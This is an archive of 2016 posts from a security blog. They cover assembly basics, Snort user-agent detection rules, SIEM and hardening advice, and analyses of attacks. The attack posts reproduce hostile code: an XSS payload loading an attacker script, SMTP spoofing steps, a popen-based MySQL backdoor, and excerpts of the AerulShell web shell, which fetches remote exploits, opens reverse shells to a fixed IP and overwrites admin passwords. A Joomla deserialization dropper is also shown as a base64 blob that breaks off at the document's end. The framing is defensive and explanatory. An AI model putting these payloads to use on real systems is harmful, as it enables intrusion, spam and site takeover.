## Saturday, September 24, 2016

### Intel Assembly Basics movl , cmpl , jns

Intel Assembly Basics

Here's a simple code block, what does it do?

0x080483c1 <+6>: movl \$0x15,-0x4(%ebp)
0x080483c8 <+13>: cmpl \$0x0,-0x4(%ebp)
0x080483cc <+17>: jns 0x80483d5
0x080483ce <+19>: movl \$0xf,-0x4(%ebp)
0x080483d5 <+26>: ...

movl is 'move long' which in this case is a 32 bit integer. Hex 0x15 is 16+5=21 so it's putting 21 onto the first value in the stack (-0x4).

cmpl is 'compare long' so it's comparing 2 integers, the value 0x0 which is simply 0 and the first value on the stack (-0x4) which from the previous line we know has a value 21. Hex 0x15 is 16+5=21 so it's putting 21 onto the first value in the stack (-0x4). Compare wants to determine if the values are the same or different. So it does that by subtracting 21 - 0 . If the result of the subtraction is 0 then it would set the Zero Flag (ZF) to 1 (or true). If the result of the subtraction is anything else then it sets the Zero Flag (ZF) to 0 (or false). Thus in this case 21-0=21 so the Zero Flag (ZF) is set to 0 (or false). Also the compare instruction sets the Sign Flag (SF) to 1 if the result is a negative number and and 0 if it's positive. In this case it's +21 to it's positive so it's set to 0.

jns is 'jump if not signed'. Jump if not signed jumps if the Sign Flag (SF) is 0 (thus if the previous compare result was positive +). So in this case SF was set to 0 which means the value was positive (or not signed), so it's going to jump to address 0x80483d5.

movl is 'move long' again just like above, and this time it's putting 15 into the top value in the stack (-0x4), but in this case since we jumped, this instruction never actually gets executed.

Thus to wrap this all up, you could rewrite this code in psuedo C code as follows

int x = 21;
if(x < 21)
x = 15;

Top Blogs of all-time

Top Github Contributions

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

### Intel Assembly Basics GCC and GDB Disassembly

Intel Assembly Basics

I want to write a C program in linux and see what X86 assembly it generates. Let's try this.

nano increment.c

int main(){
int x = 15;
x++;
}

gcc -mpreffered-stack-boundary=2 --ggdb increment.c -o increment

gdb ~/increment

(gdb) disas main

Dump of assembler code for function main:
0x080483bb <+0>: push %ebp
0x080483bc <+1>: mov %esp,%ebp
0x080483be <+3>: sub \$0x4,%esp
0x080483c1 <+6>: movl \$0xf,-0x4(%ebp)
0x080483cc <+17>: mov \$0x0,%eax
0x080483d1 <+22>: leave
0x080483d2 <+23>: ret
End of assembler dump.

Top Blogs of all-time

Top Github Contributions

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

## Friday, September 16, 2016

### Sending SMTP Emails

This kali tutorial on SMTP hacking give a simple walk-through

If you find a vulnerable SMTP server that does not require authentication you can telnet or netcat to it on port 25.

First greet the server with HELO thedomain.com

Next start a message with the sender MAIL FROM: sendingvictim@thedomain.com

And set the recipient RCPT TO: spamvictim@somewhere.com

And start the body by typing DATA

Enter the subject with SUBJECT: my subject

Then type in the body of the email you want

Then type . and hit <ENTER> to send the email

Then get out of there with QUIT

Top Blogs of all-time

Top Github Contributions

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

### Snort Rules Monitoring User-Agents

I think some Snort rules like these could be used to monitor specific user-agents that sometimes are common with recon, vulnerability scans, and exploits.

WPScan

alert tcp \$EXTERNAL_NET any -> \$HOME_NET \$HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"WPScan"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*WPScan/Hm"; metadata:service http; msg:"BLACKLIST User-Agent known malicious user-agent string WPScan - vulnerability scanner"; classtype:network-scan; rev:1; )

Wget

alert tcp \$EXTERNAL_NET any -> \$HOME_NET \$HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Wget"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20Wget/Hm"; metadata:service http; msg:"BLACKLIST User-Agent known malicious user-agent string Wget non-browser"; classtype:network-scan; rev:1; )

Synapse

alert tcp \$EXTERNAL_NET any -> \$HOME_NET \$HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Synapse"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*Synapse/Hm"; metadata:service http; reference:url,http://www.spambotsecurity.com/forum/viewtopic.php?f=43&t=2876; msg:"BLACKLIST User-Agent known malicious user-agent string Synapse - SQLi IoC"; classtype:network-scan; rev:1; )

SqlMap

alert tcp \$EXTERNAL_NET any -> \$HOME_NET \$HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"sqlmap"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*sqlmap/Hm"; metadata:service http; reference:url,http://sqlmap.org/; msg:"BLACKLIST User-Agent known malicious user-agent string sqlmap - vulnerability scanner"; classtype:network-scan; rev:1; )

Python

alert tcp \$EXTERNAL_NET any -> \$HOME_NET \$HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Python-urllib"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20Python/Hm"; metadata:service http; msg:"BLACKLIST User-Agent known malicious user-agent string Python non-browser"; classtype:network-scan; rev:3; )

PycURL

alert tcp \$EXTERNAL_NET any -> \$HOME_NET \$HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"PycURL"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*PycURL/Hm"; metadata:service http; reference:url,http://pycurl.io/; msg:"BLACKLIST User-Agent known malicious user-agent string PycURL - non Browser"; classtype:network-scan; rev:1; )

Paros

alert tcp \$EXTERNAL_NET any -> \$HOME_NET \$HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Paros"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*Paros/Hm"; metadata:service http; reference:url,http://sectools.org/tool/paros/; msg:"BLACKLIST User-Agent known malicious user-agent string Paros - vulnerability scanner"; classtype:network-scan; rev:1; )

OpenVAS

alert tcp \$EXTERNAL_NET any -> \$HOME_NET \$HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"OpenVAS"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*OpenVAS/Hm"; metadata:service http; reference:url,http://www.openvas.org/; msg:"BLACKLIST User-Agent known malicious user-agent string OpenVAS - vulnerability scanner"; classtype:network-scan; rev:2; )

Nmap

alert tcp \$EXTERNAL_NET any -> \$HOME_NET \$HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Nmap"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*Nmap/Hm"; metadata:service http; reference:url,https://nmap.org/book/nse.html; msg:"BLACKLIST User-Agent known malicious user-agent string Nmap - scanner"; classtype:network-scan; rev:2; )

Nikto

alert tcp \$EXTERNAL_NET any -> \$HOME_NET \$HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Nikto"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*Nikto/Hm"; metadata:service http; reference:url,http://sectools.org/tool/nikto/; msg:"BLACKLIST User-Agent known malicious user-agent string Nikto - vulnerability scanner"; classtype:network-scan; rev:1; )

Kazehakase

alert tcp \$EXTERNAL_NET any -> \$HOME_NET \$HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"Kazehakase"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*Kazehakase/Hm"; metadata:service http; reference:url,https://en.wikipedia.org/wiki/Kazehakase; msg:"BLACKLIST User-Agent known malicious user-agent string Kazehakase - suspicious browser"; classtype:network-scan; rev:1; )

curl

alert tcp \$EXTERNAL_NET any -> \$HOME_NET \$HTTP_PORTS (sid:xxx; gid:1; flow:established,to_server; content:"curl"; http_header; fast_pattern:only; pcre:"/^User\x2dAgent\x3a\x20[^\r\n]*curl/Hm"; metadata:service http; msg:"BLACKLIST User-Agent known malicious user-agent string curl - non browswer"; classtype:network-scan; rev:1; )

Top Blogs of all-time

Top Github Contributions

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

### MySQL Backdoors in UDFs

Thought this blog by securusglobal about MySQL Backdoor with udf was interesting. In Short, a UDF is a user-defined-function in MySQL. In general you can use it to manipulate column values for example in a select statement without having to put the dirty non-Mysql logic (such as C/C++) inside the actual select statement. Example: select udf_tocelsius(temps.fahrenheit) from temps

But instead of doing some nice like a formula or calculation, as a bad guy you could perhaps do something like

char *cmd;
FILE *fp;
strcat(cmd, args->args[i]);
fp = popen(cmd, "r");

Which is C code that essentially runs systems commands (similar to the system() function) against the operating system, so you could pass in commands that download your malware, execute it, etc.

Please note this is not a vulnerability, this is more of just an example of a backdoor persistence method. Of course a lot of things have to be setup correctly for this to even work, so for example if the attacker didn't have appropriate access or permissions were locked down tight, this might never even work. But interesting though none-the-less.

Top Blogs of all-time

Top Github Contributions

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

### SIEM Implementation (Security Incident and Event Management)

Just thought I'd throw together some items that I've experienced as being critical to the implementation and long-term success of a SIEM.

1.) Staff to manage the Infrastructure (uptime, performance, storage, upgrades)
2.) Staff to administer the SIEM (rule/alert tuning and creation, log sources collection and monitoring)
3.) Staff to monitor and analyze the alerts (ensure you have enough to manage the queue quickly and hit all SLAs)
4.) System Resources (Enough hardware, licenses, etc. so you don't drop logs, and can correlate events quickly, etc.)
5.) Custom Alerts for your Environment (disable most of the defaults, write the rules specific to what should or shouldn't happen in your company)
6.) Constant Tuning of existing Alerts (to ensure analysts are only working on useful alerts and not noisy junk)
8.) Add accurate and relevant Intel (don't blindly take free feeds, make sure the intel you gather is accurate and relevant to your environment)
9.) Log Sources Processes (ensure processes exist so whenever a new device, server, or app is brought up it doesn't go-live until you're getting logs)
10.) Document all alerts (generate a history for devices, servers, users, ips, urls, etc. so that analysts have context and don't have to re-invent the wheel)
11.) Data Classification (analysts must know what your sensitive data is and where is resides so they know what they're protecting and know when to raise red flags)
12.) Management support (you need managers that show interest and concern for things like alert queues, SLAs, false positive rates, etc. to drive improvement)

It's a lot, but if you have those things it would seem that a SIEM can be a valuable tool in your layered Security!

Top Blogs of all-time

Top Github Contributions

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

### SiteCore Security Hardening

Thought this security hardening article by Rackspace was useful for those supporting SiteCore environments. To quickly summarize

3. Secure the file upload functionality (e.g. disable execute permissions, apply a strong and strict filter, etc.
4. Improve the security of the website folder (e.g. move non-web folders like data and indexes out of the web root)
5. Increase login security (e.g. enable HTTPS and disable auto-complete)
7. Protect PhantomJS (e.g. get rid of this tool, it's generally not needed but could be used against you)
8. Protect media requests (e.g. only allow server generated requests to be processed on images)
9. Remove header information from responses sent by your website (e.g. remove response headers to prevent information leakage)

Top Blogs of all-time

Top Github Contributions

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

### Chrome to Mark HTTP as Insecure

It's exciting to see that Google Chrome will start marking HTTP login pages as insecure in January 2017.

To help users browse the web safely, Chrome indicates connection security with an icon in the address bar. Historically, Chrome has not explicitly labelled HTTP connections as non-secure. Beginning in January 2017 (Chrome 56), we’ll mark HTTP sites that transmit passwords or credit cards as non-secure, as part of a long-term plan to mark all HTTP sites as non-secure.

So I did a quick before & after to show you what it looks like. You can try this yourself by going to chrome://flags and changing "mark non-secure origins as non-secure" from Default to "mark non-secure origins as non-secure"

BEFORE you made that change an HTTP login page would look like this

AFTER you made that change an HTTP login page would look like this (notice the little red exclamation mark next to the url)

And if you were to click into the red exclamation marks to see the details it says

Why is this a good thing? Because HTTPS does multiple things for your that are critical on the internet. The obvious one is encryption, so your password are encrypted and not sent over the internet in plain text. But I've also blogged about how HTTPS gives you more than just encryption! 1.) Authenticity, Integrity, 3rd Party Vetting, Revocation and more. If you're surfing the internet over HTTP you can't trust it at all. Even if it's just a plain website. Why? There could be a man-in-the-middle monitoring your traffic, serving up and injecting code and malware, and you wouldn't even know it.

Top Blogs of all-time

Top Github Contributions

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

### Blind Cross-site Scripting (BXSS)

Matthew Bryant (@IAmMandatory) wrote a great blog post a bit ago Breaching a CA – Blind Cross-site Scripting (BXSS) in the GeoTrust SSL Operations Panel Using XSS Hunter. It has a pretty cool concept of BXSS (Blind XSS) ( or Blind Cross Site Scripting).

What is XSS?

XSS (or Cross Site Scripting) is a vulnerability in a website where you can inject Javascript code into a user input parameter (perhaps the url, query string, cookie, textbox, etc.) and because the developer did not properly validate the user input, when the HTTP response is returned and the web page is displayed by your browser, the browser mistakenly runs your user-inputted javascript. Why is this a problem? If a malicious actor can get you to click on a link and run their javascript in your browser, they can potentially compromise your browser, credentials, or even your entire system. They can inject key loggers, malware, etc. Bad Stuff.

What is BXSS?

With XSS defined above you get that immediate feedback. With BXSS you don't! I have written about BXSS once before. In short, you submit some malicious XSS user input somewhere, but the intent is not to exploit the system you're inputting the data into. Instead you're hoping to exploit and run Javascript on a different system that also manages that same data, likely at a later date. Great examples of this are websites that allow you to rate products and put comments in. If you were to inject comments into that textbox, one example of BXSS would be that hopefully when the Product Review person view your review on their internal intranet website from their cubical that the XSS code will execute on that local intranet site. Thus as the attacker you're blind, you submitted the XSS payload on the website product page, but you don't see the results, you don't get immediate feedback, you won't know if it worked until a few hours or days later when that Product Review specialist opens up your comments and attempts to moderate (approve/disapprove) them.

More from Matthew's blog

Matthew used the tool XSS Hunter which allows you to submit XSS attacks and it gives you detailed information about if the attack was successful or not, including things like screenshots of the webpage, the html code that displayed on the web page, etc. Perfect for BXSS because even though you couldn't technically see the exploit running, XSS Hunter gives you all the details as if you did.

It's an interesting concept too that Matthew mentions "In the world of blind payload testing, context is everything. You may only trigger the vulnerability a single time so you must have as much information as possible if you want to get it fixed." Basically the moderator may only ever moderate or review your comment once. Thus your first payload can't be an alert(1) test! Your first payload has to be the real-deal and it has to work the first time!

To explain Matthew's GeoTrust attack here's a short summary "during my testing I found an unintended vulnerability in GeoTrust’s Operations Panel when a support agent viewed my certificate request information. I woke up one morning with an XSS Hunter payload fire email titled [XSSHunter] XSS Payload Fired On https://ops.geotrust.com/opsdashboard/com.geotrust.presentation.app.ops.services.cancelagedorders.CancelAgedOrders/CancelAgedOrders.jsp in my inbox"

XSS Hunter showed him this code, and notice that the data[i].Customer is concatenated and ends up being displayed as html without any validation or sanitization.

for(i = 0; i < count; i++){ table = table + "<tr><td>" + data[i].ID + "</td><td>" + data[i].Product + "</td><td>" + data[i].Customer + "</td><td>" + (data[i]).Date + "</td><td>" + data[i].State + "</td></tr>";
}

So all Matthew had to do was inject the Customer field with this value

"><script src=https://y.vg></script>

And the internal Support Agent on the Intranet in his cubicle suddenly will load Matthew's evil XSS Hunter url (https://y.vg) and that url will download keyloggers, screenshots takers, or whatever other mayhem the attacker would like to inflict.

<tr><td>13785664</td><td>GeoTrust SSL Trial</td><td>"><script src="https://y.vg"></script></td><td>06/06/2016 05:40:04</td><td>Waiting for Whois Approval</td></tr>

To protect against XSS and BXSS you need to perform input validation on all user-input. User input remember can come from anywhere! Recall my blog post about What is the 'input' in input validation? In this case you can't forget that even the values in an SSL Certificate such as Customer should be consider user input, thus untrusted, and thus it needs sanitized. To sanitize you would ideally setup a regex that whitelists allowed characters / format , and you would use a standard XSS prevention library to strip out or encode malicious characters.

Top Blogs of all-time

Top Github Contributions

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

## Friday, September 2, 2016

### Intel Assembly Basics: Segment Registers

Intel Assembly Basics

6 16-bit segment registers

1.) CS #code segment
2.) DS #data segment
3.) SS #stack segment
4.) ES #extra segment
5.) FS #general purpose segment
6.) GS #general purpose segment

Base address of a segment, thus accessed with offsets to an address. Example:

mov DS:[eax], ebx

Moves the data in ebx onto the Data Segment ... but where? The address of the data segment plus the value in eax gets you the final address.

Top Blogs of all-time

Top Github Contributions

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

### Intel Assembly Basics: EIP Register

Intel Assembly Basics

EIP # instruction pointer, points to next instruction, goal of most attacks is to control this

Top Blogs of all-time

Top Github Contributions

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

### Intel Assembly Basics: General Purpose Registers

Intel Assembly Basics

8 general purpose registers
1.) EAX #can also access hi/lo order 8 bits (AH/AL)
2.) EBX #can also access hi/lo order 8 bits (BH/BL)
3.) ECX #used by many string instructions as a counter, can also access hi/lo order 8 bits (CH/CL)
4.) EDX #can also access hi/lo order 8 bits (DH/DL)
5.) ESI #used by many string instructions as a source pointer, can also access lo order 16 bits (SI)
6.) EDI #used by many string instructions as a destination pointer, can also access lo order 16 bits (DI)
7.) EBP #used in many stack operations, generally contain addresses, if wrong address can cause app to crash, can also access lo order 16 bits (BP)
8.) ESP #can also access lo order 16 bits (SP)

Top Blogs of all-time

Top Github Contributions

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

### Intel Assembly Basics: Opcode & Shell Code

Intel Assembly Basics
return 0;

Could be represented by this

leave
xor eax, eax
ret

Which have lower level cpu OpCodes of these values

leave # 0xC9
xor eax, eax # 0x31, 0xc0
ret # 0xC9

Which means if you wanted to create a shellcode of the 'return 0' statement in C you'd do the following.

unsigned char shellcode[] = "\xc9\x31\xc0\xc9";

Top Blogs of all-time

Top Github Contributions

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

### Intel Assembly Basics: return 0;

Intel Assembly Basics
return 0;

Could be represented by this

leave # destroys the stack frame
xor eax, eax # sets 0 to the eax register (xor is faster than setting it to 0, 1 or other not both)
ret # returns control back to the calling program

Top Blogs of all-time

Top Github Contributions

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

## Thursday, September 1, 2016

### AerulShell Web Shell Code Walk-Through

This Paste of the AerulShell v.4 appears to be a php webshell that an attacker can upload and get him backdoor access to compromise and manage your web server without you knowing it.

It's got some interesting features/pieces.

For authentication it requires that the parameter 'x' posted to the url has an md5 hash of c2b72f86b8ca51642c4a902887830d3e.

\$auth_pass = "c2b72f86b8ca51642c4a902887830d3e";
if( ... ( md5(\$_POST['x']) == \$auth_pass ) ) )
{ \$_SESSION[md5(\$_SERVER['HTTP_HOST'])] = true; }

Which if you go to an md5 decryptor like this you see that the password is aerulcyber so you could login to it with something like www.hackedsite.com/evilpage.php?x=aerulcyber

Also if there is a login failure then it sends an email to the 'Boss' at root@aerulcyber.biz . How do I know this? If there is a login failure it calls PrintLogin() which is deceptively names as it actually has some obfuscated code of it's own.

...
\$shell_data = "JHZpc2l0Y291bn...;
eval(base64_decode(\$shell_data));

Which if deobfuscated actually sets a cookie on your browser, counts how many times you've been there, and sends an email with your ip address to the Boss.

...
...
\$body = "Boss, there was an injected target on \$target by \$visitor";
@mail("root@aerulcyber.biz","http://\$target \$system by \$visitor", "\$body");

Also if you were to navigate to this page without the 'x' parameter it deceptively will look like an HTTP 404 page not found. But you should notice a textbox and submit button on the bottom. IF you enter the password mentioned above into the textbox and hit submit, it will log you into the web shell console.

<html>
...
<title>
</title>
...
<form method=post>
</form>

if(isset(\$_GET['dl']) && (\$_GET['dl'] != "")){
\$file = \$_GET['dl'];
\$filez = @file_get_contents(\$file);
...echo \$filez;

You could delete a file

if(isset(\$_GET['delete']) && (\$_GET['delete'] != ""))

You could make a folder

elseif(isset(\$_GET['mkdir']) && (\$_GET['mkdir'] != ""))
\$path = \$pwd.\$_GET['mkdir']; @mkdir(\$path);

You could get a shell and post commands to it

elseif(isset(\$_GET['x']) && (\$_GET['x'] == 'shell'))
<form action="?y=<?php echo \$pwd; ?>&amp;x=shell" method="post">
<table class="cmdbox">
<tr>
<td colspan="2">
<textarea class="output" readonly> <?php if(isset(\$_POST['submitcmd'])) { echo @exe(\$_POST['cmd']); } ?> </textarea>

There's also attempts to download exploits , run them, and elevate you to root

\$pilih = \$_POST['pilih'];
if ( \$pilih == 'autoroot1') {
mkdir('auto',0777);
\$file = file_get_contents('http://svchost.nazuka.net/a.txt');
\$IIIIIIIIl11I = fopen('auto/auto.pl','w');
chmod("auto/auto.pl",0777);
fwrite(\$IIIIIIIIl11I,\$file);
fclose(\$IIIIIIIIl11I);
print 'autoroot telah diluncurkan Boss....

There are also additional "bonus tools" that the shell will download and execute , basically stripping text off pastebin.

\$file = file_get_contents('http://pastebin.com/raw.php?i=gtTLMyya');
\$IIIIIIIIl11I = fopen('meter.php','w');

\$file = file_get_contents('http://pastebin.com/raw.php?i=ctQsPjpn');
\$IIIIIIIIl11I = fopen('wy.php','w');

\$file = file_get_contents('http://pastebin.com/raw.php?i=mGSK1EEa');
\$IIIIIIIIl11I = fopen('back.php','w');

\$file = file_get_contents('http://pastebin.com/raw.php?i=aBHs2nWR');
\$IIIIIIIIl11I = fopen('back.pl','w');

You can pull up a reverse shell back to these ip addresses , it events gives the attacker friendly hints/reminders on how to use it.

+--=[ Backconnect Reverse Shell ]=--+
...
Choose Backconnect Command
...
<form method="post" action="">&
...
<option value="back1" > Perl Backconnect </option>
<option value="back2"> Php Backconnect </option>
<option value="back3"> Weevely </option>
<option value="back4"> Php Metasploit </option>
...
my \$ip = '222.255.167.45';
my \$port = '57899';
...
\$ip = '222.255.167.45';
\$port = 57899;
...
my \$ip = '222.255.167.45';
my \$port = '57899';
...
\$ip = '222.255.167.45';
\$port = 57899;
...
usage : nc -lvvp 57899

You can upload a file to the hacked web server with a tool of your choice

...
<option value="wwget">wget</option>
<option value="wlynx">lynx</option>
<option value="wfetch">fetch</optoion>
<option value="wget">GET</option>
<option value="wcurl">curl</option>

You can deface the site and tell them why you did it

elseif(isset(\$_GET['x']) && (\$_GET['x'] == 'zone-h')){?>

<input class="inputz" type="text" name="defacer" size="67" value="Aerul Da White-Hkc" /><br> <select class="inputz" name="hackmode">
<option>------------------------------------SELECT-------------------------------------</option>
<option style="background-color: rgb(0, 0, 0);" value="1">known vulnerability (i.e. unpatched system)</option>
<option style="background-color: rgb(0, 0, 0);" value="2" >undisclosed (new) vulnerability</option>
<option style="background-color: rgb(0, 0, 0);" value="3" >configuration / admin. mistake</option>
<option style="background-color: rgb(0, 0, 0);" value="4" >brute force attack</option>
<option style="background-color: rgb(0, 0, 0);" value="5" >social engineering</option>
<option style="background-color: rgb(0, 0, 0);" value="6" >Web Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="7" >Web Server external module intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="8" >Mail Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="9" >FTP Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="10" >SSH Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="11" >Telnet Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="12" >RPC Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="13" >Shares misconfiguration</option>
<option style="background-color: rgb(0, 0, 0);" value="14" >Other Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="15" >SQL Injection</option>
<option style="background-color: rgb(0, 0, 0);" value="16" >URL Poisoning</option>
<option style="background-color: rgb(0, 0, 0);" value="17" >File Inclusion</option>
<option style="background-color: rgb(0, 0, 0);" value="18" >Other Web Application bug</option>
<option style="background-color: rgb(0, 0, 0);" value="19" >Remote administrative panel access bruteforcing</option>
<option style="background-color: rgb(0, 0, 0);" value="20" >Remote administrative panel access password guessing</option>
<option style="background-color: rgb(0, 0, 0);" value="21" >Remote administrative panel access social engineering</option>
<option style="background-color: rgb(0, 0, 0);" value="23" >Access credentials through Man In the Middle attack</option>
<option style="background-color: rgb(0, 0, 0);" value="24" >Remote service password guessing</option>
<option style="background-color: rgb(0, 0, 0);" value="25" >Remote service password bruteforce</option>
<option style="background-color: rgb(0, 0, 0);" value="26" >Rerouting after attacking the Firewall</option>
<option style="background-color: rgb(0, 0, 0);" value="27" >Rerouting after attacking the Router</option>
<option style="background-color: rgb(0, 0, 0);" value="28" >DNS attack through social engineering</option>
<option style="background-color: rgb(0, 0, 0);" value="29" >DNS attack through cache poisoning</option>
<option style="background-color: rgb(0, 0, 0);" value="30" >Not available</option>
...
<select class="inputz" name="reason">
<option >------------------------------------SELECT-------------------------------------</option>
<option style="background-color: rgb(0, 0, 0);" value="1" >Heh...just for fun!</option>
<option style="background-color: rgb(0, 0, 0);" value="2" >Revenge against that website</option>
<option style="background-color: rgb(0, 0, 0);" value="3" >Political reasons</option>
<option style="background-color: rgb(0, 0, 0);" value="4" >As a challenge</option>
<option style="background-color: rgb(0, 0, 0);" value="5" >I just want to be the best defacer</option>
<option style="background-color: rgb(0, 0, 0);" value="6" >Patriotism</option>
<option style="background-color: rgb(0, 0, 0);" value="7" >Not available</option>

You could launch a port scan on somebody

function sws_port_scan(\$ip)
{
\$list_post = array('80','21','22','2082','25','53','110','443','143');
foreach (\$list_post as \$o_port)
{
\$connect = @fsockopen(\$ip,\$o_port,\$errno,\$errstr,5);

\$SQL=@mysql_query("UPDATE jos_users SET password ='".\$pwd."' WHERE ID = 62") or die(mysql_error());
\$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".\$hash."' WHERE ID = 1") or die(mysql_error());

Try to bruteforce guess some default passwords

+--==[ Cpanel BruteForce ]==--+

abcd1234
abcdef
acb123

There are many more features if you dig deeper into the code. But hopefully this information above gives a good overview of the power and danger of web shells like AerulShell and gives you a bit more insight into the interworkings and the thought process behind the writers of web shells like this.

Top Blogs of all-time

Top Github Contributions

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

### Joomla DeSerialize Deobfuscation 101

Saw this web request , it is the Joomla unserialize vulnerability. Going to walk through below how to see what it's doing.

GET /

Joomla wasn't validating input and when de-serializing this blob above would actually evaluate and execute some of it. What you may ask? Well take the base64 encoded stuff and do a quick decode and you get.

\$check = \$_SERVER['DOCUMENT_ROOT'] . "/media/xxxx.php" ;
\$fp=fopen("\$check","w+");
fwrite(\$fp,base64_decode('PD9waHANCmZ1bmN0aW9uIGh0dHBfZ2V0KCR1cmwpew0KCSRpbSA9IGN1cmxfaW5pdCgkdXJsKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMTApOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0hFQURFUiwgMCk7DQoJcmV0dXJuIGN1cmxfZXhlYygkaW0pOw0KCWN1cmxfY2xvc2UoJGltKTsNCn0NCiRjaGVjayA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL21lZGlhL2Nzcy5waHAiIDsNCiR0ZXh0ID0gaHR0cF9nZXQoJ2h0dHA6Ly9tcnRnLnVpLnBoaW5tYS5lZHUucGgvY29tcG9uZW50cy9qb29tbGEudHh0Jyk7DQokb3BlbiA9IGZvcGVuKCRjaGVjaywgJ3cnKTsNCmZ3cml0ZSgkb3BlbiwgJHRleHQpOw0KZmNsb3NlKCRvcGVuKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjaykpew0KICAgIGVjaG8gJGNoZWNrLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzIjsNCmVjaG8gImRvbmUgLlxuICIgOw0KJGNoZWNrMiA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL21lZGlhL2ptYWlsLnBocCIgOw0KJHRleHQyID0gaHR0cF9nZXQoJ2h0dHA6Ly9tcnRnLnVpLnBoaW5tYS5lZHUucGgvY29tcG9uZW50cy9qbWFpbHoudHh0Jyk7DQokb3BlbjIgPSBmb3BlbigkY2hlY2syLCAndycpOw0KZndyaXRlKCRvcGVuMiwgJHRleHQyKTsNCmZjbG9zZSgkb3BlbjIpOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrMikpew0KICAgIGVjaG8gJGNoZWNrMi4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0czIiOw0KZWNobyAiZG9uZTIgLlxuICIgOw0KDQokY2hlY2szPSRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL0guaHRtIiA7DQokdGV4dDMgPSBodHRwX2dldCgnJyk7DQokb3AzPWZvcGVuKCRjaGVjazMsICd3Jyk7DQpmd3JpdGUoJG9wMywkdGV4dDMpOw0KZmNsb3NlKCRvcDMpOw0KDQokY2hlY2s0PSRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL21lZGlhL2NoZWNrLnBocCIgOw0KJHRleHQ0ID0gaHR0cF9nZXQoJ2h0dHA6Ly9tcnRnLnVpLnBoaW5tYS5lZHUucGgvY29tcG9uZW50cy9xcS50eHQnKTsNCiRvcDQ9Zm9wZW4oJGNoZWNrNCwgJ3cnKTsNCmZ3cml0ZSgkb3A0LCR0ZXh0NCk7DQpmY2xvc2UoJG9wNCk7DQoNCiRjaGVjazU9JF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvL21lZGlhL2ptYWlscy5waHAiIDsNCiR0ZXh0NSA9IGh0dHBfZ2V0KCdodHRwOi8vbXJ0Zy51aS5waGlubWEuZWR1LnBoL2NvbXBvbmVudHMvcXF6LnR4dCcpOw0KJG9wNT1mb3BlbigkY2hlY2s1LCAndycpOw0KZndyaXRlKCRvcDUsJHRleHQ1KTsNCmZjbG9zZSgkb3A1KTsNCg0KJGNoZWNrNj0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi9saWJyYXJpZXMvam9vbWxhL3Nlc3Npb24vc2Vzc2lvbi5waHAiIDsNCiR0ZXh0NiA9IGh0dHBf